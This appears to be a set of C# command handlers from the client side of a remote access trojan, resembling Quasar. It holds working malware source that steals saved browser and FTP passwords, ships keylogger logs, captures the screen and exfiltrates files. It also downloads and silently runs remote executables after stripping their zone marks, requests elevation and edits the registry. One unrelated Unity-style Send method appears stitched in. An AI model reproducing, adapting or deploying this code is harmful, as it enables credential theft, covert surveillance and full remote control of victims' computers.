public static void HandleDoProcessStart(DoProcessStart command, Networking.Client client) { if (string.IsNullOrEmpty(command.ApplicationName)) { client.Send(new SetStatus { Message = "Process could not be started!" }); return; } try { ProcessStartInfo startInfo = new ProcessStartInfo { UseShellExecute = true, FileName = command.ApplicationName }; Process.Start(startInfo); } catch { client.Send(new SetStatus { Message = "Process could not be started!" }); } finally { HandleGetProcesses(new GetProcesses(), client); } }
public static void HandleDoAskElevate(DoAskElevate command, Networking.Client client) { if (WindowsAccountHelper.GetAccountType() != "Admin") { ProcessStartInfo processStartInfo = new ProcessStartInfo { FileName = "cmd", Verb = "runas", Arguments = "/k START \"\" \"" + ClientData.CurrentPath + "\" & EXIT", WindowStyle = ProcessWindowStyle.Hidden, UseShellExecute = true }; MutexHelper.CloseMutex(); // close the mutex so our new process will run try { Process.Start(processStartInfo); } catch { client.Send(new SetStatus { Message = "User refused the elevation request." }); MutexHelper.CreateMutex(Settings.MUTEX); // re-grab the mutex return; } Program.ConnectClient.Exit(); } else { client.Send(new SetStatus { Message = "Process already elevated." }); } }
public static void HandleGetAuthentication(GetAuthentication command, Networking.Client client) { GeoLocationHelper.Initialize(); client.Send(new GetAuthenticationResponse { Version = Settings.VERSION, OperatingSystem = PlatformHelper.FullName, AccountType = WindowsAccountHelper.GetAccountType(), Country = GeoLocationHelper.GeoInfo.Country, CountryCode = GeoLocationHelper.GeoInfo.CountryCode, Region = GeoLocationHelper.GeoInfo.Region, City = GeoLocationHelper.GeoInfo.City, ImageIndex = GeoLocationHelper.ImageIndex, Id = DevicesHelper.HardwareId, Username = WindowsAccountHelper.GetName(), PcName = SystemHelper.GetPcName(), Tag = Settings.TAG }); if (ClientData.AddToStartupFailed) { Thread.Sleep(2000); client.Send(new SetStatus { Message = "Adding to startup failed." }); } }
public static void HandleDoUploadAndExecute(DoUploadAndExecute command, Networking.Client client) { if (!RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Add(command.Id, FileHelper.GetTempFilePath(Path.GetExtension(command.FileName))); } string filePath = RenamedFiles[command.Id]; try { if (command.CurrentBlock == 0 && Path.GetExtension(filePath) == ".exe" && !FileHelper.HasExecutableIdentifier(command.Block)) { throw new Exception("No executable file"); } var destFile = new FileSplitLegacy(filePath); if (!destFile.AppendBlock(command.Block, command.CurrentBlock)) { throw new Exception(destFile.LastError); } if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute { if (RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Remove(command.Id); } FileHelper.DeleteZoneIdentifier(filePath); ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = false; startInfo.FileName = filePath; Process.Start(startInfo); client.Send(new SetStatus { Message = "Executed File" }); } } catch (Exception ex) { if (RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Remove(command.Id); } NativeMethods.DeleteFile(filePath); client.Send(new SetStatus { Message = $"Execution failed: {ex.Message}" }); } }
public static void HandleGetDrives(GetDrives command, Networking.Client client) { DriveInfo[] driveInfos; try { driveInfos = DriveInfo.GetDrives().Where(d => d.IsReady).ToArray(); } catch (IOException) { client.Send(new SetStatusFileManager { Message = "GetDrives I/O error", SetLastDirectorySeen = false }); return; } catch (UnauthorizedAccessException) { client.Send(new SetStatusFileManager { Message = "GetDrives No permission", SetLastDirectorySeen = false }); return; } if (driveInfos.Length == 0) { client.Send(new SetStatusFileManager { Message = "GetDrives No drives", SetLastDirectorySeen = false }); return; } Models.Drive[] drives = new Models.Drive[driveInfos.Length]; for (int i = 0; i < drives.Length; i++) { try { var displayName = !string.IsNullOrEmpty(driveInfos[i].VolumeLabel) ? string.Format("{0} ({1}) [{2}, {3}]", driveInfos[i].RootDirectory.FullName, driveInfos[i].VolumeLabel, driveInfos[i].DriveType.ToFriendlyString(), driveInfos[i].DriveFormat) : string.Format("{0} [{1}, {2}]", driveInfos[i].RootDirectory.FullName, driveInfos[i].DriveType.ToFriendlyString(), driveInfos[i].DriveFormat); drives[i] = new Models.Drive { DisplayName = displayName, RootDirectory = driveInfos[i].RootDirectory.FullName }; } catch (Exception) { } } client.Send(new GetDrivesResponse { Drives = drives }); }
public static void HandleDoUploadFile(FileTransferChunk command, Networking.Client client) { try { if (CanceledFileTransfers.ContainsKey(command.Id)) { return; } if (command.Chunk.Offset == 0 && File.Exists(command.FilePath)) { NativeMethods.DeleteFile(command.FilePath); // delete existing file } using (var destFile = new FileSplit(command.FilePath, FileAccess.Write)) { destFile.WriteChunk(command.Chunk); } } catch (Exception) { CanceledFileTransfers.Add(command.Id, "error"); client.Send(new FileTransferCancel { Id = command.Id, Reason = "Error writing file" }); } }
public static void HandleGetConnections(Networking.Client client, GetConnections packet) { var table = GetTable(); var connections = new Models.TcpConnection[table.Length]; for (int i = 0; i < table.Length; i++) { string processName; try { var p = Process.GetProcessById((int)table[i].owningPid); processName = p.ProcessName; } catch { processName = $"PID: {table[i].owningPid}"; } connections[i] = new Models.TcpConnection { ProcessName = processName, LocalAddress = table[i].LocalAddress.ToString(), LocalPort = table[i].LocalPort, RemoteAddress = table[i].RemoteAddress.ToString(), RemotePort = table[i].RemotePort, State = (ConnectionState)table[i].state }; } client.Send(new GetConnectionsResponse { Connections = connections }); }
public static void HandleDoShutdownAction(DoShutdownAction command, Networking.Client client) { try { ProcessStartInfo startInfo = new ProcessStartInfo(); switch (command.Action) { case ShutdownAction.Shutdown: startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.UseShellExecute = true; startInfo.Arguments = "/s /t 0"; // shutdown startInfo.FileName = "shutdown"; Process.Start(startInfo); break; case ShutdownAction.Restart: startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.UseShellExecute = true; startInfo.Arguments = "/r /t 0"; // restart startInfo.FileName = "shutdown"; Process.Start(startInfo); break; case ShutdownAction.Standby: Application.SetSuspendState(PowerState.Suspend, true, true); // standby break; } } catch (Exception ex) { client.Send(new SetStatus { Message = $"Action failed: {ex.Message}" }); } }
public static void Uninstall(Networking.Client client) { try { if (Settings.STARTUP) { Startup.RemoveFromStartup(); } string batchFile = BatchFile.CreateUninstallBatch(ClientData.CurrentPath, Keylogger.LogDirectory); if (string.IsNullOrEmpty(batchFile)) { throw new Exception("Could not create uninstall-batch file"); } ProcessStartInfo startInfo = new ProcessStartInfo { WindowStyle = ProcessWindowStyle.Hidden, UseShellExecute = true, FileName = batchFile }; Process.Start(startInfo); Program.ConnectClient.Exit(); } catch (Exception ex) { client.Send(new SetStatus { Message = $"Uninstall failed: {ex.Message}" }); } }
public static void HandleCreateRegistryKey(DoCreateRegistryKey packet, Networking.Client client) { GetCreateRegistryKeyResponse responsePacket = new GetCreateRegistryKeyResponse(); string errorMsg; string newKeyName = ""; try { responsePacket.IsError = !(RegistryEditor.CreateRegistryKey(packet.ParentPath, out newKeyName, out errorMsg)); } catch (Exception ex) { responsePacket.IsError = true; errorMsg = ex.Message; } responsePacket.ErrorMsg = errorMsg; responsePacket.Match = new RegSeekerMatch { Key = newKeyName, Data = RegistryKeyHelper.GetDefaultValues(), HasSubKeys = false }; responsePacket.ParentPath = packet.ParentPath; client.Send(responsePacket); }
public static void HandleDoClientUninstall(DoClientUninstall command, Networking.Client client) { client.Send(new SetStatus { Message = "Uninstalling... good bye :-(" }); ClientUninstaller.Uninstall(client); }
public static void HandleGetMonitors(GetMonitors command, Networking.Client client) { if (Screen.AllScreens.Length > 0) { client.Send(new GetMonitorsResponse { Number = Screen.AllScreens.Length }); } }
public void Send(string message) { if (connection == null) { Debug.LogWarning("No connection assigned"); return; } connection.Send(message); }
public static void HandleDoDownloadFileCancel(FileTransferCancel command, Networking.Client client) { if (!CanceledFileTransfers.ContainsKey(command.Id)) { CanceledFileTransfers.Add(command.Id, "canceled"); client.Send(new FileTransferCancel { Id = command.Id, Reason = "Canceled" }); } }
public static void HandleDoShowMessageBox(DoShowMessageBox command, Networking.Client client) { new Thread(() => { MessageBox.Show(command.Text, command.Caption, (MessageBoxButtons)Enum.Parse(typeof(MessageBoxButtons), command.Button), (MessageBoxIcon)Enum.Parse(typeof(MessageBoxIcon), command.Icon), MessageBoxDefaultButton.Button1, MessageBoxOptions.DefaultDesktopOnly); }).Start(); client.Send(new SetStatus { Message = "Showed Messagebox" }); }
public static void HandleGetPasswords(GetPasswords packet, Networking.Client client) { List <RecoveredAccount> recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); client.Send(new GetPasswordsResponse { RecoveredAccounts = recovered }); }
public static void HandleDoDownloadFile(FileTransferRequest command, Networking.Client client) { new Thread(() => { LimitThreads.WaitOne(); try { using (var srcFile = new FileSplit(command.RemotePath, FileAccess.Read)) { ActiveTransfers[command.Id] = srcFile; foreach (var chunk in srcFile) { if (!client.Connected || !ActiveTransfers.ContainsKey(command.Id)) { break; } // blocking sending might not be required, needs further testing client.SendBlocking(new FileTransferChunk { Id = command.Id, FilePath = command.RemotePath, FileSize = srcFile.FileSize, Chunk = chunk }); } } } catch (Exception) { client.Send(new FileTransferCancel { Id = command.Id, Reason = "Error reading file" }); } finally { RemoveFileTransfer(command.Id); LimitThreads.Release(); } }).Start(); }
public static void Update(Networking.Client client, string newFilePath) { try { FileHelper.DeleteZoneIdentifier(newFilePath); var bytes = File.ReadAllBytes(newFilePath); if (!FileHelper.IsValidExecuteableFile(bytes)) { throw new Exception("no pe file"); } string batchFile = FileHelper.CreateUpdateBatch(newFilePath, Settings.INSTALL && Settings.HIDEFILE); if (string.IsNullOrEmpty(batchFile)) { throw new Exception("Could not create update batch file."); } ProcessStartInfo startInfo = new ProcessStartInfo { WindowStyle = ProcessWindowStyle.Hidden, UseShellExecute = true, FileName = batchFile }; Process.Start(startInfo); if (Settings.STARTUP) { Startup.RemoveFromStartup(); } Program.ConnectClient.Exit(); } catch (Exception ex) { NativeMethods.DeleteFile(newFilePath); client.Send(new SetStatus { Message = $"Update failed: {ex.Message}" }); } }
public static void HandleGetSystemInfo(GetSystemInfo command, Networking.Client client) { try { IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties(); var domainName = (!string.IsNullOrEmpty(properties.DomainName)) ? properties.DomainName : "-"; var hostName = (!string.IsNullOrEmpty(properties.HostName)) ? properties.HostName : "-"; var geoInfo = GeoInformationFactory.GetGeoInformation(); List <Tuple <string, string> > lstInfos = new List <Tuple <string, string> > { new Tuple <string, string>("Processor (CPU)", DevicesHelper.GetCpuName()), new Tuple <string, string>("Memory (RAM)", $"{DevicesHelper.GetTotalRamAmount()} MB"), new Tuple <string, string>("Video Card (GPU)", DevicesHelper.GetGpuName()), new Tuple <string, string>("Username", WindowsAccountHelper.GetName()), new Tuple <string, string>("PC Name", SystemHelper.GetPcName()), new Tuple <string, string>("Domain Name", domainName), new Tuple <string, string>("Host Name", hostName), new Tuple <string, string>("System Drive", Path.GetPathRoot(Environment.SystemDirectory)), new Tuple <string, string>("System Directory", Environment.SystemDirectory), new Tuple <string, string>("Uptime", SystemHelper.GetUptime()), new Tuple <string, string>("MAC Address", DevicesHelper.GetMacAddress()), new Tuple <string, string>("LAN IP Address", DevicesHelper.GetLanIp()), new Tuple <string, string>("WAN IP Address", geoInfo.IpAddress), new Tuple <string, string>("ASN", geoInfo.Asn), new Tuple <string, string>("ISP", geoInfo.Isp), new Tuple <string, string>("Antivirus", SystemHelper.GetAntivirus()), new Tuple <string, string>("Firewall", SystemHelper.GetFirewall()), new Tuple <string, string>("Time Zone", geoInfo.Timezone), new Tuple <string, string>("Country", geoInfo.Country) }; client.Send(new GetSystemInfoResponse { SystemInfos = lstInfos }); } catch { } }
public static void HandleDeleteRegistryKey(DoDeleteRegistryKey packet, Networking.Client client) { GetDeleteRegistryKeyResponse responsePacket = new GetDeleteRegistryKeyResponse(); string errorMsg; try { responsePacket.IsError = !(RegistryEditor.DeleteRegistryKey(packet.KeyName, packet.ParentPath, out errorMsg)); } catch (Exception ex) { responsePacket.IsError = true; errorMsg = ex.Message; } responsePacket.ErrorMsg = errorMsg; responsePacket.ParentPath = packet.ParentPath; responsePacket.KeyName = packet.KeyName; client.Send(responsePacket); }
public static void HandleChangeRegistryValue(DoChangeRegistryValue packet, Networking.Client client) { GetChangeRegistryValueResponse responsePacket = new GetChangeRegistryValueResponse(); string errorMsg; try { responsePacket.IsError = !(RegistryEditor.ChangeRegistryValue(packet.Value, packet.KeyPath, out errorMsg)); } catch (Exception ex) { responsePacket.IsError = true; errorMsg = ex.Message; } responsePacket.ErrorMsg = errorMsg; responsePacket.KeyPath = packet.KeyPath; responsePacket.Value = packet.Value; client.Send(responsePacket); }
public static void HandleGetRegistryKey(DoLoadRegistryKey packet, Networking.Client client) { GetRegistryKeysResponse responsePacket = new GetRegistryKeysResponse(); try { RegistrySeeker seeker = new RegistrySeeker(); seeker.BeginSeeking(packet.RootKeyName); responsePacket.Matches = seeker.Matches; responsePacket.IsError = false; } catch (Exception e) { responsePacket.IsError = true; responsePacket.ErrorMsg = e.Message; } responsePacket.RootKey = packet.RootKeyName; client.Send(responsePacket); }
public static void HandleGetProcesses(GetProcesses command, Networking.Client client) { Process[] pList = Process.GetProcesses(); var processes = new Models.Process[pList.Length]; for (int i = 0; i < pList.Length; i++) { var process = new Models.Process { Name = pList[i].ProcessName + ".exe", Id = pList[i].Id, MainWindowTitle = pList[i].MainWindowTitle }; processes[i] = process; } client.Send(new GetProcessesResponse { Processes = processes }); }
public static void HandleCreateRegistryValue(DoCreateRegistryValue packet, Networking.Client client) { GetCreateRegistryValueResponse responsePacket = new GetCreateRegistryValueResponse(); string errorMsg; string newKeyName = ""; try { responsePacket.IsError = !(RegistryEditor.CreateRegistryValue(packet.KeyPath, packet.Kind, out newKeyName, out errorMsg)); } catch (Exception ex) { responsePacket.IsError = true; errorMsg = ex.Message; } responsePacket.ErrorMsg = errorMsg; responsePacket.Value = RegistryKeyHelper.CreateRegValueData(newKeyName, packet.Kind, packet.Kind.GetDefault()); responsePacket.KeyPath = packet.KeyPath; client.Send(responsePacket); }
public static void HandleDoVisitWebsite(DoVisitWebsite command, Networking.Client client) { string url = command.Url; if (!url.StartsWith("http")) { url = "http://" + url; } if (Uri.IsWellFormedUriString(url, UriKind.RelativeOrAbsolute)) { if (!command.Hidden) { Process.Start(url); } else { try { HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(url); request.UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"; request.AllowAutoRedirect = true; request.Timeout = 10000; request.Method = "GET"; using (HttpWebResponse response = (HttpWebResponse)request.GetResponse()) { } } catch { } } client.Send(new SetStatus { Message = "Visited Website" }); } }
public static void HandleDoUploadFile(FileTransferChunk command, Networking.Client client) { try { if (command.Chunk.Offset == 0) { if (File.Exists(command.FilePath)) { NativeMethods.DeleteFile(command.FilePath); // delete existing file } ActiveTransfers[command.Id] = new FileSplit(command.FilePath, FileAccess.Write); } if (!ActiveTransfers.ContainsKey(command.Id)) { return; } var destFile = ActiveTransfers[command.Id]; destFile.WriteChunk(command.Chunk); if (destFile.FileSize == command.FileSize) { RemoveFileTransfer(command.Id); } } catch (Exception) { RemoveFileTransfer(command.Id); client.Send(new FileTransferCancel { Id = command.Id, Reason = "Error writing file" }); } }
public static void HandleDoClientUpdate(DoClientUpdate command, Networking.Client client) { // i dont like this updating... if anyone has a better idea feel free to edit it if (string.IsNullOrEmpty(command.DownloadUrl)) { if (!RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Add(command.Id, FileHelper.GetTempFilePath(".exe")); } string filePath = RenamedFiles[command.Id]; try { if (command.CurrentBlock == 0 && !FileHelper.HasExecutableIdentifier(command.Block)) { throw new Exception("No executable file"); } var destFile = new FileSplitLegacy(filePath); if (!destFile.AppendBlock(command.Block, command.CurrentBlock)) { throw new Exception(destFile.LastError); } if ((command.CurrentBlock + 1) == command.MaxBlocks) // Upload finished { if (RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Remove(command.Id); } client.Send(new SetStatus { Message = "Updating..." }); ClientUpdater.Update(client, filePath); } } catch (Exception ex) { if (RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Remove(command.Id); } NativeMethods.DeleteFile(filePath); client.Send(new SetStatus { Message = $"Update failed: {ex.Message}" }); } return; } new Thread(() => { client.Send(new SetStatus { Message = "Downloading file..." }); string tempFile = FileHelper.GetTempFilePath(".exe"); try { using (WebClient c = new WebClient()) { c.Proxy = null; c.DownloadFile(command.DownloadUrl, tempFile); } } catch { client.Send(new SetStatus { Message = "Download failed!" }); return; } client.Send(new SetStatus { Message = "Replacing executable..." }); ClientUpdater.Update(client, tempFile); }).Start(); }
public static void HandleGetDesktop(GetDesktop command, Networking.Client client) { // TODO: Capture mouse in frames: var monitorBounds = ScreenHelper.GetBounds((command.DisplayIndex)); var resolution = new Resolution { Height = monitorBounds.Height, Width = monitorBounds.Width }; if (StreamCodec == null) { StreamCodec = new UnsafeStreamCodec(command.Quality, command.DisplayIndex, resolution); } if (command.CreateNew || StreamCodec.ImageQuality != command.Quality || StreamCodec.Monitor != command.DisplayIndex || StreamCodec.Resolution != resolution) { if (StreamCodec != null) { StreamCodec.Dispose(); } StreamCodec = new UnsafeStreamCodec(command.Quality, command.DisplayIndex, resolution); } BitmapData desktopData = null; Bitmap desktop = null; try { desktop = ScreenHelper.CaptureScreen(command.DisplayIndex); desktopData = desktop.LockBits(new Rectangle(0, 0, desktop.Width, desktop.Height), ImageLockMode.ReadWrite, desktop.PixelFormat); using (MemoryStream stream = new MemoryStream()) { if (StreamCodec == null) { throw new Exception("StreamCodec can not be null."); } StreamCodec.CodeImage(desktopData.Scan0, new Rectangle(0, 0, desktop.Width, desktop.Height), new Size(desktop.Width, desktop.Height), desktop.PixelFormat, stream); client.Send(new GetDesktopResponse { Image = stream.ToArray(), Quality = StreamCodec.ImageQuality, Monitor = StreamCodec.Monitor, Resolution = StreamCodec.Resolution }); } } catch (Exception) { if (StreamCodec != null) { client.Send(new GetDesktopResponse { Image = null, Quality = StreamCodec.ImageQuality, Monitor = StreamCodec.Monitor, Resolution = StreamCodec.Resolution }); } StreamCodec = null; } finally { if (desktop != null) { if (desktopData != null) { try { desktop.UnlockBits(desktopData); } catch { } } desktop.Dispose(); } } }
public static void HandleGetKeyloggerLogs(GetKeyloggerLogs command, Networking.Client client) { new Thread(() => { try { int index = 1; if (!Directory.Exists(Keylogger.LogDirectory)) { client.Send(new GetKeyloggerLogsResponse { Filename = "", Block = new byte[0], MaxBlocks = -1, CurrentBlock = -1, CustomMessage = "", Index = index, FileCount = 0 }); return; } FileInfo[] iFiles = new DirectoryInfo(Keylogger.LogDirectory).GetFiles(); if (iFiles.Length == 0) { client.Send(new GetKeyloggerLogsResponse { Filename = "", Block = new byte[0], MaxBlocks = -1, CurrentBlock = -1, CustomMessage = "", Index = index, FileCount = 0 }); return; } foreach (FileInfo file in iFiles) { var srcFile = new FileSplitLegacy(file.FullName); if (srcFile.MaxBlocks < 0) { client.Send(new GetKeyloggerLogsResponse { Filename = "", Block = new byte[0], MaxBlocks = -1, CurrentBlock = -1, CustomMessage = srcFile.LastError, Index = index, FileCount = iFiles.Length }); } for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++) { byte[] block; if (srcFile.ReadBlock(currentBlock, out block)) { client.Send(new GetKeyloggerLogsResponse { Filename = Path.GetFileName(file.Name), Block = block, MaxBlocks = srcFile.MaxBlocks, CurrentBlock = currentBlock, CustomMessage = srcFile.LastError, Index = index, FileCount = iFiles.Length }); //Thread.Sleep(200); } else { client.Send(new GetKeyloggerLogsResponse { Filename = "", Block = new byte[0], MaxBlocks = -1, CurrentBlock = -1, CustomMessage = srcFile.LastError, Index = index, FileCount = iFiles.Length }); } } index++; } } catch (Exception ex) { client.Send(new GetKeyloggerLogsResponse { Filename = "", Block = new byte[0], MaxBlocks = -1, CurrentBlock = -1, CustomMessage = ex.Message, Index = -1, FileCount = -1 }); } }).Start(); }
public static void HandleDoDownloadAndExecute(DoDownloadAndExecute command, Networking.Client client) { client.Send(new SetStatus { Message = "Downloading file..." }); new Thread(() => { string tempFile = FileHelper.GetTempFilePath(".exe"); try { using (WebClient c = new WebClient()) { c.Proxy = null; c.DownloadFile(command.Url, tempFile); } } catch { client.Send(new SetStatus { Message = "Download failed" }); return; } client.Send(new SetStatus { Message = "Downloaded File" }); try { FileHelper.DeleteZoneIdentifier(tempFile); var bytes = File.ReadAllBytes(tempFile); if (!FileHelper.HasExecutableIdentifier(bytes)) { throw new Exception("no pe file"); } ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = false; startInfo.FileName = tempFile; Process.Start(startInfo); } catch (Exception ex) { NativeMethods.DeleteFile(tempFile); client.Send(new SetStatus { Message = $"Execution failed: {ex.Message}" }); return; } client.Send(new SetStatus { Message = "Executed File" }); }).Start(); }